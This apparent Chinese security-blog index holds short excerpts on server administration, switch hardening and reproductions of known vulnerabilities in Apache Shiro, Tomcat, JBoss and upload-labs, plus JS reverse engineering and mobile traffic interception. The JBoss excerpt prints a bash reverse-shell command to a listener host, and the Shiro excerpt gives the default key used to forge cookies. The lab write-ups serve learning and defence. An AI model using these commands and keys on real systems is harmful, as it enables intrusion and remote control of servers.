OpenSSH升级记录
升级OpenSSL1234567891011# 下载OpenSSLwget https://www.openssl.org/source/openssl-3.0.8.tar.gz# 解压tar -zxvf openssl-3.0.8.tar.gzcd openssl-3.0.8# 配置./config --prefix=/usr/ --openssldir=/usr/ shared# 编译安装make && make install# 查看版本openssl version -a
问题:Can't locate IPC/Cmd.pm in @INC (@INC contains:
123456# 解决yum install -y perl-CPAN# 步骤:1.yes 2.manual 3.yesperl -MCPAN -e shell# 安装install IPC/Cmd.pm
安装Telnet防止升级出错12yum -y install telnet-serversystemctl start telnet.socket
问题:无法远程
12345# ...
Apache shiro系列漏洞
Apache shiro 1.2.4反序列化漏洞(CVE-2016-4437)漏洞描述Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。
Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。
影响版本Apache Shiro <= 1.2.4
漏洞复现
在 1.2.4 版本前,默认ASE秘钥Key: kPH+bIxk5D2deZiIxcaaaA==
工具:https://github.com/SummerSec/ShiroAttack2
登录时查看返回包是否含有rememberMe字段,如果没有则将请求包的cookie字段设置为Cookie: rememberme=1。
修复建议
升级版本
修改密钥
Apache Shiro 认证绕过漏洞(CVE-2020-1957)漏洞描述Apache Shiro是一款开源安全 ...
Linux磁盘管理
Linux磁盘分区
如果磁盘容量小于2TB,系统默认使用MBR分区表来安装。
这里强行使用GPT分区表分区;install centos7选项按tab键,在末尾输入inst.gpt关键字。
123456# 40GB分区情况(根据实际情况划为其它如:/data、/var等)BIOS boot 2MB/boot 1GB/ 10GB/home 5GBswap 1GB
Linux磁盘管理
lsblk列出系统上的所有磁盘列表
blkid列出设备参数
parted device_name print列出磁盘类型和分区信息
磁盘分区
MBR分区表使用fdisk分区,GPT分区表使用gdisk分区
1gdisk device_name
delete a partition 删除一个分区
add a new partition 增加一个分区
print the partition table 打印分区表
quit without saving changes 不保存分区离开
write table to disk and exit 保存分区操作后离开
不要在MBR分区表使用g ...
交换机常见场景配置
场景一:端口镜像
网络维护过程中会遇到需要对报文进行获取和分析的情况,比如怀疑有攻击报文,此时需要在不影响报文转发的情况下,对报文进行获取和分析。
镜像可以在不影响报文正常处理流程的情况下,将镜像端口的报文复制一份到观察端口,用户利用数据监控设备来分析复制到观察端口的报文,进行网络监控和故障排除。
Huawei S5700:配置项
123456789101112131415# 配置观察口[Huawei]observe-port [ observe-port-index ] interface interface-type interface-number# 配置观察端口组[Huawei]observe-port group group-id[Huawei]group-member { interface-type interface-number [ to interface-type interface-number ] } &<1-8>quit# 配置本地端口镜像[Huawei]interface interface-type interf ...
华为交换机加固
身份鉴别
开启密码复杂度;定期修改密码;开启登录失败处理策略和登录会话超时时间
有些老旧的交换机无法进行配置,一般来说新设备都自己开启了密码策略
123456789101112// 开启密码策略password-control enable// 开启密码有效期的策略password-control aging enable// 配置密码有效的时间为90天password-control aging 90// 开启密码长度的限制password-control length enable// 配置密码长度最小为16位password-control length 16// 配置密码可尝试的失败次数为10password-control login-attempt 10 exceed lock-time 10
设置登录会话超时时间
1234567[Huawei-aaa]local-user admin idle-timeout ? INTEGER<0-35791> Set the number of minutes before terminal user(s) tim ...
微信公众号平台js逆向
前言JS逆向学习,根据教程进行案例实战并记录过程,本次案例为微信公众号登录密码字段加密逆向。
逆向分析在登录界面输入账号和密码点击登录获取到数据请求包,这里实验随便输入账号密码。
按f12使用开发者工具,在网络选项中查看请求,查看我们请求所提交的表单数据,发现pwd也就是我们的密码字段已经做了加密。
加密字段是pwd,这时直接srtl+shift+f全局搜索关键字pwd。
这时搜索到很多含有pwd关键字的文件,一般加密都是通过js文件来进行加密,直接查看js文件中的pwd关键字
直接点击js文件,这时的js文件是压缩的,直接点击{}进行格式化
然后在查看js文件中的20条匹配结果,对有pwd关键字的地方或者是看起来像加密的地方下断点。
打上断点之后重新点击登录按钮进入调试状态,运行到第一个断点,发现pwd值为123。
选中全部会发现这个字符串就是加密后的值,说明此处对pwd进行了加密处理
进入下一步函数调用
进入到return这里,发现调用了很多函数,然后返回了加密值
找到这里所有的js代码,对这最后这个}往上的所有函数,也就是靠着左边红线 ...
upload-labs文件上传
Pass-01前端js限制文件上传类型,只需要绕过js即可上传文件
利用burp的proxy模块,移除所有js文件
禁用js脚本
修改前端源码,删除js代码
直接演示第三种方法,将源码拷贝到新的html文件
12345<form enctype="multipart/form-data" method="post" onsubmit="return checkFile()"> <p>请选择要上传的图片:<p> <input class="input_file" type="file" name="upload_file"/> <input class="button" type="submit" name="submit" value="上传"/> </form>
修改源码文件,action选项 ...
Tomcat系列漏洞
Tomcat PUT方法任意写文件漏洞1、漏洞描述Tomcat 远程执行漏洞,当存在漏洞的Tomcat运行在Windows主机上且启用了HTTP PUT请求方法,攻击者就可以通过构造的攻击请求向服务器上传包含任意代码的JSP文件,造成任意代码执行。
2、影响版本Apache Tomcat 7.0.0 至 7.9.79
3、环境搭建docker-compose up -d
访问网址:http://xxx:8080/,即可看到Tomcat界面
4、漏洞复现Tomcat 在/conf/web.xml文件中,Tomcat配置可写文件的选项,也就是readonly为false,默认情况下是true
1234567891011121314151617<servlet> <servlet-name>default</servlet-name> <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class> <init-param& ...
JBoss系列漏洞复现
JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)1、漏洞描述该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。
2、影响版本5.x和6.x版本
3、漏洞复现3.1 环境搭建docker-compose up -d快速搭建环境
访问网址:http://xxx:8080/,即可看到JBoos默认界面
3.2 漏洞利用漏洞出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化
通过检测工具发现存在漏洞,工具地址:https://github.com/yunxu1/jboss-_CVE-2017-12149
反弹shell
使用bash来反弹shell
1bash -i >& /dev/tcp/192.168.0.103/10888 0>&1
但由于Runtime.getRuntime().ex ...
burp抓取微信小程序
前期准备:
夜神模拟器
burp
JustTrustMe插件
插件下载地址:
https://github.com/Fuzion24/JustTrustMe/releases
1、Xposed+JustTrustMe安装安装好夜神模拟器之后,启用Android5
打开模拟器之后进入应用商店下载Xposed框架
进入Xposed,选择推荐安装,然后重启模拟器,这里我已经安装完成。这里主要root授权选择永久授权
然后把下载好的JustTrustMe拖入模拟器,模拟器会自动识别安装,安装完成之后会提示你未使用该模块,进入Xposed里勾选使用该模块,然后重启一下模拟器
2、burp抓包配置打开burp配置监听端口,ip地址选择当前使用的网卡ip地址
模拟器进入设置VLAN选项,长按即可出现修改网络的选项
选择高级选择手动配置代理,然后填入burp配置的ip和端口
给https协议安装证书,这里我在电脑上使用浏览器打开burp网址,下载CA证书,然后更改后缀名为cer,原来的为der。最终文件名:cacert.cer
直接拖进模拟器
模拟器会自动打开存放目录,记住这个 ...